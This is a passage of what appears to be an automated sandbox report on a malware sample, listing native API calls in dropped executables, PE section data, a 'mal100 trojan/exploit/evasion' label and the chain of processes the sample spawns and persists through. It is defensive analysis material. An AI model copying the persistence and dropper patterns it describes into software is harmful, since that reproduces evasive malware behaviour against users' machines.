                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B10D7 ZwOpenKey,ZwCreateKey,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4740FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5260E9 ZwOpenKey,ZwClose,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52E0E9 RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwClose,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B108B ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B473880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AA080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BA890 ZwQueryDebugFilterState,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9890 ZwFsControlFile,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49F0AE ZwSetInformationWorkerFactory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5260A2 ZwQueryInformationFile,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A18B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AF0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BB0B0 ZwTraceControl,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B0F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4FA746 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9740 ZwOpenThreadToken,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B505F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9750 ZwQueryInformationThread,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ACF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52CF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B476F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BAF60 ZwSetTimer2,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9F70 ZwCreateIoCompletion,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9770 ZwSetInformationFile,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B50176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548F6A RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B506715 memset,memcpy,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A9702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9710 ZwQueryInformationToken,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52CF30 ZwAlertThreadByThreadId,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AE730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9730 ZwQueryVirtualMemory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AD7CA RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B97C0 ZwTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ADFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BAFD0 ZwShutdownWorkerFactory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A37EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B480FFD RtlInitUnicodeString,ZwQueryValueKey,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B500FEC ZwDuplicateObject,ZwDuplicateObject,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B505780 DbgPrompt,ZwWow64DebuggerCall,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B525F87 ZwUnmapViewOfSection,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AFF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4FA7AC ZwCompareSigningLevels,ZwCompareSigningLevels,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B97A0 ZwUnmapViewOfSection,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B3FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B506652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BB640 RtlUnhandledExceptionFilter,ZwTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BB650 RtlUnhandledExceptionFilter,ZwTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9650 ZwQueryValueKey,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ABE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BAE70 ZwSetInformationWorkerFactory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9670 ZwQueryInformationProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B502E14 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B2E1C RtlInitializeCriticalSectionEx,ZwDelayExecution,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9610 ZwEnumerateValueKey,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9E20 ZwCancelTimer2,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52FE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B543E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47B630 ZwWaitForKeyedEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9E30 ZwCancelWaitCompletionPacket,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B96C0 ZwSetInformationProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4766D4 RtlInitUnicodeString,ZwQueryValueKey,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A9ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B96D0 ZwCreateKey,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5016FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B96E0 ZwFreeVirtualMemory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49E6F9 ZwAlpcSetInformation,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4876FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4CDEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B473E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52BE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ADE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472E9F ZwCreateEvent,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B543EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9EA0 ZwCompareSigningLevels,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B502EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B541D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A0548 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,ZwQueryVirtualMemory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B501D43 ZwQueryInformationThread,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B501570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B536D61 ZwAllocateVirtualMemoryEx,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B501D6A ZwWaitForMultipleObjects,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9D70 ZwAlpcQueryInformation,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B501D0B ZwSetInformationProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BAD10 ZwSetCachedSigningLevel,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548D34 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A1520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9520 ZwWaitForSingleObject,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52FD22 ZwQueryInformationProcess,RtlUniform,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A4D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52FDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B474DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B95C0 ZwSetEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49EDC4 ZwCancelWaitCompletionPacket,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4745D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B95D0 ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52BDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9DE0 ZwAssociateWaitCompletionPacket,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4795F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B95F0 ZwQueryInformationFile,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531582 ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53B581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B473591 ZwSetInformationFile,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4765A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9DA0 ZwAlpcSendWaitReceivePort,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B95B0 ZwSetInformationThread,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9DB0 ZwAlpcSetInformation,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9C40 ZwAllocateVirtualMemoryEx,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B475450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B501C49 ZwQueryInformationProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548C75 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B501C76 ZwQueryInformationProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AAC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B523C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B5C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9C70 ZwAlpcConnectPort,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548C14 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531411 ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B0413 ZwUnmapViewOfSection,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47E420 RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlpLoadUserUIByPolicy,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BA420 ZwGetNlsSectionPtr,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49FC39 ZwAssociateWaitCompletionPacket,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ACCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472CDB RtlFreeHeap,ZwClose,ZwSetEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5314FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5264FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B501CE4 ZwQueryInformationProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BA480 ZwInitializeNlsFiles,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F3C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47EC9B RtlInitUnicodeString,ZwOpenKey,RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlFreeHeap,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlAllocateHeap,RtlpLoadMachineUIByPolicy,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B549CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B0CA1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B544CAB ZwTraceControl,
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 26_2_02A948D8 NtAllocateVirtualMemory,
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 26_2_02A948D0 NtAllocateVirtualMemory,
                        Source: 8615.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: 77DC.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: 66A4.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: 152F.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: bejhieg.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: cnv622JnZv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jejhiegJump to behavior
                        Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@41/20@58/8
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                        Source: cnv622JnZv.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 25_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Users\user\Desktop\cnv622JnZv.exe 'C:\Users\user\Desktop\cnv622JnZv.exe'
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeProcess created: C:\Users\user\Desktop\cnv622JnZv.exe 'C:\Users\user\Desktop\cnv622JnZv.exe'
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\jejhieg C:\Users\user\AppData\Roaming\jejhieg
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeProcess created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe
                        Source: C:\Users\user\AppData\Roaming\jejhiegProcess created: C:\Users\user\AppData\Roaming\jejhieg C:\Users\user\AppData\Roaming\jejhieg
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\66A4.exe C:\Users\user\AppData\Local\Temp\66A4.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\77DC.exe C:\Users\user\AppData\Local\Temp\77DC.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8615.exe C:\Users\user\AppData\Local\Temp\8615.exe
